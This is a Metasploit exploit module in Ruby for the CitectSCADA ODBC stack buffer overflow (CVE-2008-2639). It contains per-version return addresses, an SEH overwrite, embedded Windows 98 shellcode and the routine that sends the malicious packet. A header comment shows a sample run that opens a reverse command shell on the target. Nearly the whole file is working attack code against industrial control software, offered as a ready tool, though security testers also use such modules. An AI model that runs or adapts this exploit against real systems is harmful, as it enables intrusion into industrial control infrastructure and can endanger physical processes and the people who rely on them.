## # $Id: citect_scada_odbc.rb ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## # # # msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E # [*] Started reverse handler # ... # [*] Sending stage (474 bytes) # [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039) # # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Citect\CitectSCADA\Bin> # # Arbitrary code has been sucessfully run on Windows XP SP2 and SP3, Win98 SE and Windows 2003 Server SP1 # require 'msf/core' module Msf class Exploits::Windows::Misc::Citect_SCADA_ODBC < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'CitectSCADA ODBC Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in CitectSCADA's ODBC daemon. This has only been tested against Citect v5, v6 and v7. }, 'Author' => [ 'KF ' ], 'Version' => '$Revision: 1 $', 'References' => [ ['CVE', 'CVE-2008-2639'], ['BID', '29634'], ['URL', 'http://www.schneider-electric.com/sites/corporate/en/press/press-releases/viewer-press-releases.page?c_filepath=/templatedata/Content/Press_Release/data/en/shared/2005/10/20051019_schneider_electric_adds_scada_and_mes_capabilities_to_i.xml'], ['URL', 'http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability','http://www.auscert.org.au/render.html?it=9433'], ['URL', 'http://www.auscert.org.au/render.html?it=9433'], ['URL', 'http://www.controsys.hu/anyagok/group_quality_assurance.pdf'], ['URL', 'http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ # Small sample of potential targets... There ARE universal targets for *some* versions. The base address can varry unfortunately. ['CiExceptionMailer.dll on XP Sp2 or SP3 5.42', { 'Version' => '5.42', 'OS' => 'xp', 'Ret' => 0x003a530e, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216 } } ], ['CiExceptionMailer.dll on Server 2003 Sp2 6.0-r0', { 'Version' => '6.0-r0', 'OS' => '2003', 'Ret' => 0x003a6aad, 'Jump' => 0xffffff15e9, 'Payload' => { 'Space' => 212 } } ], ['CiExceptionMailer.dll on XP Sp2 or SP3 6.0-r0', { 'Version' => '6.0-r0', 'OS' => 'xp', 'Ret' => 0x0039cd5a, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216 } } ], ['CiExceptionMailer.dll on XP Sp2 or SP3 6.10', { 'Version' => '6.10', 'OS' => 'xp', 'Ret' => 0x00501113, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 380 } } ], ['CiExceptionMailer.dll on XP Sp2 or SP3 7.0-r0', { 'Version' => '7.0-r0', 'OS' => 'xp', 'Ret' => 0x003e1e92, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 380 } } ], ['CiExceptionMailer.dll on 2003 Server SP1 7.0-r0', { 'Version' => '7.0-r0', 'OS' => '2003', 'Ret' => 0x003d59d7, 'Jump' => 0xfffffe7be9, 'Payload' => { 'Space' => 376 } } ], ['CiExceptionMailer.dll on Win98 5.50-r0', { 'Version' => '5.50-r0', 'OS' => 'win98', 'Ret' => 0x006dd8b7, 'Jump' => 0xffffff6fe9, 'Payload' => { 'Space' => 140 } } ], ['CiExceptionMailer.dll on XP SP2 5.50-r0', { 'Version' => '5.50-r0', 'OS' => 'xp', 'Ret' => 0x003a5e90, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216 } } ], ['CiExceptionMailer.dll on 2003 Server 5.50-r0', { 'Version' => '5.50-r0', 'OS' => '2003', 'Ret' => 0x003952ee, 'Jump' => 0xffffff15e9, 'Payload' => { 'Space' => 212 } } ], ['Test Crash', { 'Version' => '666', 'OS' => 'test', 'Ret' => 0xdeadbeef, 'Jump' => 0xdeadbabeee, 'Payload' => { 'Space' => 8192 } } ], ], 'Privileged' => false, 'DisclosureDate' => 'June 11 2008' )) register_options( [ Opt::RPORT(20222) ], self.class) end def exploit connect print_status("Trying target #{target.name}...") if payload_space() != payload.encoded.length print_status("Metasploit payload bug... please check out from SVN") exit else print_status("Space: #{payload_space()}") end shortjmp = 0xeb069090 # jump over garbage for SEH foo if(target['OS'] =~ /xp/) print_status("Using Windows XP Target") elsif (target['OS'] =~ /2003/) print_status("Using Windows 2003 Target") elsif (target['OS'] =~ /98/) print_status("no 98 foo yet") else (target['OS'] =~ /test/) print_status("Just testing.... don't mind me") end padding = 100 # Just fill up the end of the stack... # There is some redundant shit here... will be cleaned up soon enough... if (target['Version'] =~ /5.42/) || (target['Version'] =~ /6.0-r0/) filler = "\x90" * 10 + [target['Jump']].pack('Q')[0..4] + "\x90" * padding mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler elsif (target['Version'] =~ /6.10/) || (target['Version'] =~ /7.0-r0/) filler = [target['Jump']].pack('Q')[0..4] + "\x90" * padding mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler elsif (target['Version'] =~ /5.50-r0/) # This particular target encompases win98 windows XP and windows 2003 just so that no one feels left out. # EVERYONE *CAN* be exploited... not just the guys running the modern stuff. Someone only needs to take a bit # of time to have a robust exploit for any platform or version they choose... if(target['OS'] =~ /win98/) hop1 = 0xebb69090 # Short jump into small 72 byte buffer space - EBb6 hop2 = target['Jump'] # Near jump into begining of entire buffer... leaves 140 chars of space. seh = [target.ret].pack("V") # Call EAX from CiExceptionMailer.dll # Description : It is 110 Byte Shellcode which Pops up Message Box Under win98 # This is just sample code from the milw0rm...its using static addresses from MY win98 hell = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" + "\xd0\x76\xf7\xbf" + # LoadLibraryA(libraryname) IN win98 "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb" + "\xa8\x6d\xf7\xbf" + # GetProcAddress(hmodule,functionname) "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51" + "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff" + "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" + "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" + "\xff" + "PWNED." + "\x4e" mal = "\x90" * (payload_space - hell.length) + hell + [hop2].pack('Q')[0..4] + "Z" * 67 + [hop1].pack("N") + seh + "\x41" * padding elsif target['OS'] =~ /xp/ || target['OS'] =~ /2003/ filler = "\x90" * 10 + [target['Jump']].pack('Q')[0..4] + "\x90" * padding mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler end else (target['Version'] =~ /666/) # Use this to find offsets for other versions that were not provided. mal = Rex::Text.pattern_create(payload_space, Rex::Text::DefaultPatternSets) print_status("Use pattern_offset.rb to find the length") end # Open your eyes people... listen carefully to the rhetoric. There is no spoon. wakeup = [0x0000000002].pack('Q')[0..4] + [mal.length].pack("N") + mal len = [wakeup.length].pack("N") sock.put(len) sock.put(wakeup) print_status("Sent malicious ODBC packet...") handler print_status("Citect and other SCADA and Control vendors have been communicating potential " + "vulnerabilities of control systems when they are connected to the internet for some time. ") print_status("However, Citect believes this is only relevant to a company using ODBC technology and " + "directly connecting its system to the internet with no security in place -") print_status("a situation unlikely in today’s business environment. ") disconnect end end end